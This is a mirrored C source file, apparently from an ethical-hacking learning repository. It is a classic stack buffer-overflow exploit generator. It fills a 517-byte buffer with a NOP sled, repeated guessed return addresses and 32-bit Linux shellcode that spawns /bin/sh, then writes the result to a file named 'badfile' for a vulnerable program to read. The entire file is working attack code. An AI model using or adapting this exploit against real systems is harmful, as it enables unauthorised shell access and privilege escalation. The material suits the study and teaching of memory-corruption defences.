mirror of
https://github.com/The-Art-of-Hacking/h4cker
synced 2024-11-25 04:10:17 +00:00
69 lines
No EOL
1.2 KiB
C
69 lines
No EOL
1.2 KiB
C
//exploit.c
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
#define DEFAULT_OFFSET 350
|
|
|
|
char code[]=
|
|
"\x31\xc0"
|
|
"\x50"
|
|
"\x68""//sh"
|
|
"\x68""/bin"
|
|
"\x89\xe3"
|
|
"\x50"
|
|
"\x53"
|
|
"\x89\xe1"
|
|
"\x99"
|
|
"\xb0\x0b"
|
|
"\xcd\x80"
|
|
;
|
|
|
|
unsigned long get_sp(void)
|
|
{
|
|
__asm__("movl %esp,%eax");
|
|
}
|
|
|
|
void main(int argc, char **argv)
|
|
{
|
|
char buffer[517];
|
|
FILE *badfile;
|
|
char *ptr;
|
|
long *a_ptr,ret;
|
|
|
|
int offset = DEFAULT_OFFSET;
|
|
int codeSize = sizeof(code);
|
|
int buffSize = sizeof(buffer);
|
|
|
|
if(argc > 1) offset = atoi(argv[1]); //this allows for command line input
|
|
|
|
ptr=buffer;
|
|
a_ptr = (long *) ptr;
|
|
|
|
/* Initialize buffer with 0x90 (NOP instruction) */
|
|
memset(buffer, 0x90, buffSize);
|
|
|
|
//----------------------BEGIN FILL BUFFER----------------------\\
|
|
|
|
ret = get_sp()+offset;
|
|
printf("Return Address: 0x%x\n",get_sp());
|
|
printf("Address: 0x%x\n",ret);
|
|
|
|
ptr = buffer;
|
|
a_ptr = (long *) ptr;
|
|
|
|
int i;
|
|
for (i = 0; i < 300;i+=4)
|
|
*(a_ptr++) = ret;
|
|
|
|
for(i = 486;i < codeSize + 486;++i)
|
|
buffer[i] = code[i-486];
|
|
|
|
buffer[buffSize - 1] = '\0';
|
|
//-----------------------END FILL BUFFER-----------------------\\
|
|
|
|
|
|
/* Save the contents to the file "badfile" */
|
|
badfile = fopen("./badfile", "w");
|
|
fwrite(buffer,517,1,badfile);
|
|
fclose(badfile);
|
|
} |